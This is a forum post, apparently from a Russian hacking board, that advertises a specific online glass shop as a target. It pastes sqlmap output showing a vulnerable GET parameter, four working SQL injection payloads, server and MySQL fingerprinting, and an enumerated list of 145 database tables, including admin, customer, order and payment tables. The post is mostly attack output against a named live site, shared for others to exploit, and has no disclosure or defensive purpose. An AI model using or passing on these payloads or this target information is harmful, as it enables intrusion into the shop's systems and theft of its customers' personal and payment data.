29.10.2019, 22:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
56255
Репутация:
2
|
|
glassofvenice.com
интернет магазин
внутри много интересного.
Код:
Code:
https://www.glassofvenice.com/landingpages.php?lp=murano-glass-beads&filters=36_10_38
Parameter: lp (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lp=murano-glass-beads' AND 5931=5931 AND 'HFLm'='HFLm&filters=36_10_38
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: lp=murano-glass-beads' AND (SELECT 2228 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT (ELT(2228=2228,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rqhj'='rqhj&filters=36_10_38
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: lp=murano-glass-beads' AND SLEEP(5) AND 'AqWz'='AqWz&filters=36_10_38
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: lp=-8269' UNION ALL SELECT 53,53,53,53,53,53,CONCAT(0x717a6b7a71,0x4a61754d67545a515571454669416b6f567a4d68696c4c4b57546d4a4b4a434c7752545479434164,0x7171766b71),53,53-- lNAv&filters=36_10_38
---
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0
Database: glassdb
[145 tables]
+----------------------------------------------------+
| address_book |
| address_format |
| admin |
| admin_files |
| admin_groups |
| admin_logs |
| affiliate_affiliate |
| affiliate_banners |
| affiliate_banners_history |
| affiliate_clickthroughs |
| affiliate_news |
| affiliate_news_contents |
| affiliate_newsletters |
| affiliate_payment |
| affiliate_payment_status |
| affiliate_payment_status_history |
| affiliate_sales |
| amzn_orders |
| amzn_orders_items |
| amzn_products |
| amzn_products_description |
| amzn_products_report |
| amzn_reviews |
| amzn_seller_feedbacks |
| banners |
| banners_history |
| cache |
| cache_filters |
| cart_reminder |
| catalog_product_entity |
| categories |
| categories_description |
| configuration |
| configuration_group |
| contrib_tracker |
| counter |
| counter_history |
| countries |
| coupon_email_track |
| coupon_gv_customer |
| coupon_gv_queue |
| coupon_redeem_track |
| coupons |
| coupons_description |
| currencies |
| customer_entity |
| customers |
| customers_basket |
| customers_basket_attributes |
| customers_basket_info |
| customers_info |
| customers_points_pending |
| customers_temp |
| directory_country |
| directory_country_region |
| dos_protect |
| eav_attribute |
| eav_attribute_option |
| eav_attribute_option_value |
| emails_templates |
| etsy_products |
| etsy_products_images |
| etsy_taxonomies |
| filter_product_options |
| filter_products_attributes |
| filter_products_options_values |
| filter_products_options_values_to_products_options |
| geo_zones |
| giftwrap_options |
| google_checkout |
| google_configuration |
| google_orders |
| headertags |
| headertags_cache |
| headertags_default |
| headertags_pages |
| headertags_silo |
| inv_inventory_purchases |
| inv_model_xref |
| jet_orders |
| jet_orders_products |
| jet_returns |
| jet_returns_products |
| jet_returns_products_refund_amount |
| landing_pages |
| landing_pages_products |
| languages |
| mage_orders |
| mage_orders_products |
| manufacturers |
| manufacturers_info |
| newsletters |
| orders |
| orders_products |
| orders_products_attributes |
| orders_products_download |
| orders_status |
| orders_status_history |
| orders_status_history_transactions |
| orders_total |
| products |
| products_attributes |
| products_attributes_download |
| products_attributes_relations |
| products_attributes_sets |
| products_attributes_sets_elements |
| products_attributes_sets_to_products |
| products_description |
| products_extra_images |
| products_notifications |
| products_options |
| products_options_values |
| products_options_values_to_products_options |
| products_recommend |
| products_taxonomy_mapping |
| products_to_categories |
| products_variants |
| products_variants_images |
| products_variants_to_products_attributes |
| products_xsell |
| reviews |
| reviews_description |
| rma_return_reasons |
| scart |
| search_queries |
| search_queries_sorted |
| searchword_swap |
| sessions |
| sitemap_exclude |
| sliders |
| sliders_description |
| sliders_images |
| sliders_images_links |
| specials |
| tax_class |
| tax_rates |
| visitor |
| visual_verify_code |
| whos_online |
| wishlists |
| wishlists_products |
| wm_products |
| ws_products |
| zones |
| zones_to_geo_zones |
+----------------------------------------------------+
|
|
|
|